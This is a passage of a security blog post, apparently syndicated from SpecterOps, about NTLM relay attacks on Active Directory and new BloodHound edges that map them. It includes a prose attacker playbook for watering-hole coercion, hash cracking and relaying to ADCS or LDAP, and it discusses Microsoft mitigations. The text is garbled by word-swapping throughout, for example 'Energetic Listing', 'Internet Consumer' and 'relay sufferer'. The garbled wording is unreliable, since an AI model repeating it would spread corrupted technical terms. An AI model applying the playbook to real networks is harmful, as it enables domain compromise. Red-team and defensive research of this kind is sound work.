As talked about above, following a profitable relay, the relay sufferer can configure RBCD or Shadow Credentials in opposition to its personal pc account to compromise the host. Along with that, if the pc account occurs to have any abusable permissions in Energetic Listing, these will likely be viable as nicely, with the caveat that the ForcePasswordChange edge (password reset) is barely abusable by way of LDAPS and never by way of LDAP.
In the true world, it is extremely widespread to seek out domain-joined workstations with the Internet Consumer operating, and area controllers are very not often configured to require each LDAP singing and channel binding or run on Home windows Server 2025, so it is a very rel(a)yable solution to compromise domain-joined hosts. It’s much more widespread to abuse this method for native privilege escalation on domain-joined workstations as a result of ease of turning the Internet Consumer service on and coercing authentication from SYSTEM as a low-privileged consumer.
LDAP-Particular Limitations
You could have seen that BloodHound at present doesn’t take NTLMv1 into consideration for edge creation.
One other essential limitation to notice is that the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are created based mostly on the present Internet Consumer service standing, however it is extremely dynamic. The truth that the service was not operating on a bunch throughout assortment doesn’t imply it would stay that method and that the host will not be uncovered.
Basic Limitations
Up to now, we’ve talked about some limitations affecting particular edge varieties. There are additionally limitations affecting all the brand new NTLM relay edges:
- Solely pc account authentication coercion eventualities are thought of. Person authentication coercion is out of scope at this time.
- Solely coercion eventualities are thought of. Opportunistic relay assaults, i.e., ready for an acceptable relay sufferer to authenticate to an attacker-controlled host, similar to authenticated vulnerability scanners, are out of scope.
- Firewalls or types and community restrictions are out of scope and never considered for these new relay edges, simply as they weren’t considered for any of the earlier BloodHound edges.
We additionally make a normal assumption that pc account authentication coercion will be triggered by Authenticated Customers, as defined earlier.
Future Work
We plan to introduce extra relay edges sooner or later. We have already got relay to MS SQL and WinRM on our roadmap. We’re at all times open to recommendations when you have extra concepts/requests.
NTLM Abuse Technique
Let’s take all the things coated on this publish and put collectively an NTLM abuse technique.
First, let’s make some observations and assumptions:
- NTLM challenge-response seize is much less noisy than NTLM relay, however cracking relies on the energy of the password.
- Person authentication coercion can set off the Internet Consumer service to begin, however pc authentication coercion can’t.
- Scanning for hosts with the Internet Consumer service operating will be noisy. Equally, amassing session data is noisy and even unattainable with out native admin rights.
- NTLM relay assaults ought to be exact on purple staff operations. The “Spray and Pray” method ought to be averted.
Given the above, I suggest the next method:
- Originally of an op/evaluation, solid a large internet for consumer authentication coercion by watering gap assaults on high-traffic file shares or internet pages. Attempt to coerce and seize each WebDAV and SMB site visitors in case you can. SMB is usually extra more likely to succeed, however that is your alternative to begin the Internet Consumer service on each affected shopper.
- As you seize NTLM responses, maintain observe of the place customers authenticate from — it tells you the place they’ve a session. It’s, in a method, passive session assortment.
- Try and crack passwords of fascinating accounts that may provide help to escalate privileges or obtain your goals. Don’t waste your GPU on meaningless accounts.
- In the event you establish an fascinating consumer however can’t crack the password, it’s time to relay.
- Goal the pc on which the consumer was energetic and compromise it by way of relay to ADCS (ESC8) or by way of relay to LDAP/LDAPS (RBCD or Shadow Credentials).
- When you achieve admin entry to the host, you possibly can doubtlessly keep away from the danger concerned in lateral motion and credential abuse by putting an authentication coercion file on the consumer’s desktop by way of the C$ share and relaying the NTLM alternate to the goal useful resource.
What’s Microsoft Doing About It?
Microsoft has been making efforts to mitigate these assaults. As I discussed, relaying to LDAP is now not potential in opposition to area controllers operating Home windows Server 2025, and all Home windows 11 and Home windows Server 2025 hosts now require SMB signing by default. It’s an excellent begin.
Microsoft has been engaged on a way more important initiative to deprecate NTLM altogether. They’ve recognized the next the reason why Home windows hosts nonetheless use NTLM and have began engaged on options:
- Till not too long ago, the one choice for native account authentication was NTLM. Microsoft is within the technique of rolling out a “native KDC” to assist Kerberos authentication for native accounts.
- When purchasers don’t have a line of sight to a site controller, they’ll’t get hold of Kerberos tickets and must fall again to NTLM. Microsoft is within the technique of rolling out IAKERB, which is able to flip each Home windows host right into a Kerberos proxy.
- Kerberos authentication requires mapping the useful resource that the shopper is making an attempt to entry to a service account. That is finished by service principal names (SPN). SPNs normally use hostnames slightly than IP addresses, so when a shopper makes an attempt to entry a useful resource by IP deal with, Kerberos authentication usually fails. Nonetheless, as of Home windows Server 2016, SPNs assist SPNs with IP addresses.
- Most NTLM utilization is a results of software program hard-coded to name the NTLM authentication bundle as a substitute of the Negotiate bundle, which wraps Kerberos and NTLM and negotiates the most suitable choice. Microsoft has been engaged on fixing these hard-coded points in its personal software program, and, rumor has it, they’ve additionally been working with third events to repair their code.
Microsoft intends to have NTLM disabled by default (not fully eliminated), which implies that even when the day lastly comes, we’ll seemingly nonetheless discover organizations that flip it again on, simply as we nonetheless discover hosts with NTLMv1 enabled. Final I heard, Microsoft had plans to have it finished by 2028, however I imagine they’re already delayed, and, if historical past has taught us something, we should always suspect it would take for much longer than that.
Kerberos is NOT the Answer
For a few years, folks thought that Kerberos was not vulnerable to relay assaults as a result of it’s based mostly on tickets, and each ticket is issued to a particular service, so you possibly can’t relay it to arbitrary targets. However that’s now not the case. As James Forshaw found and Andrea Pierini weaponized, there are authentication coercion primitives that permit the attacker to regulate the service identify for which the relay sufferer obtains a Kerberos ticket. These coercion primitives negotiate session safety with signing, to allow them to’t be relayed to LDAP/LDAPS. Nonetheless, they’re suitable with relaying to SMB and ADCS.
Subsequently, disabling NTLM will not be the answer. Making certain all servers implement signing and channel binding is the proper solution to mitigate relay assaults.
We could add Kerberos relay edges to BloodHound sooner or later. Till then, you will be assured that everytime you see CoerceAndRelayNTLMToADCS or CoerceAndRelayNTLMToSMB edges, you possibly can relay both NTLM or Kerberos.
Why Are We Releasing It Now?
There are various misconceptions about the issue and the answer for the NTLM relay issues. The brand new edges we launched into BloodHound will hopefully carry readability and put it within the highlight, serving to organizations prioritize some of the important but underestimated dangers affecting Energetic Listing environments.
Higher Remediation Methods
The remediation steering for NTLM relay assaults is commonly “implement all the things, in every single place”, which isn’t very sensible in a big surroundings that requires backward compatibility. Nonetheless, BloodHound now helps defenders see what’s truly viable of their environments and prioritize high-impact/publicity targets. BloodHound has a set of pre-built cypher queries that may get you began with that.
Conclusion
NTLM relay assaults are removed from useless. In truth, they’re usually simpler to execute and more practical than many safety practitioners notice. This previous method stays one of many paths of least resistance in trendy Energetic Listing environments, routinely enabling trivial pivots to high-value targets. The introduction of NTLM relay edges in BloodHound has made figuring out and visualizing these assault paths remarkably easy: with only a few clicks, an operator can see how Authenticated Customers can relay their method from zero to hero. In different phrases, BloodHound now depicts, with clear, intuitive edges, what as soon as required stitching collectively data from a number of instruments, exhibiting defenders the true dangers they face whereas permitting attackers to, as soon as once more, assume in graphs.
The Renaissance of NTLM Relay Assaults: All the pieces You Must Know was initially printed in Posts By SpecterOps Staff Members on Medium, the place individuals are persevering with the dialog by highlighting and responding to this story.
*** This can be a Safety Bloggers Community syndicated weblog from Posts By SpecterOps Staff Members – Medium authored by Elad Shamir. Learn the unique publish at: https://posts.specterops.io/the-renaissance-of-ntlm-relay-attacks-everything-you-need-to-know-abfc3677c34e?supply=rss—-f05f8696e3cc—4
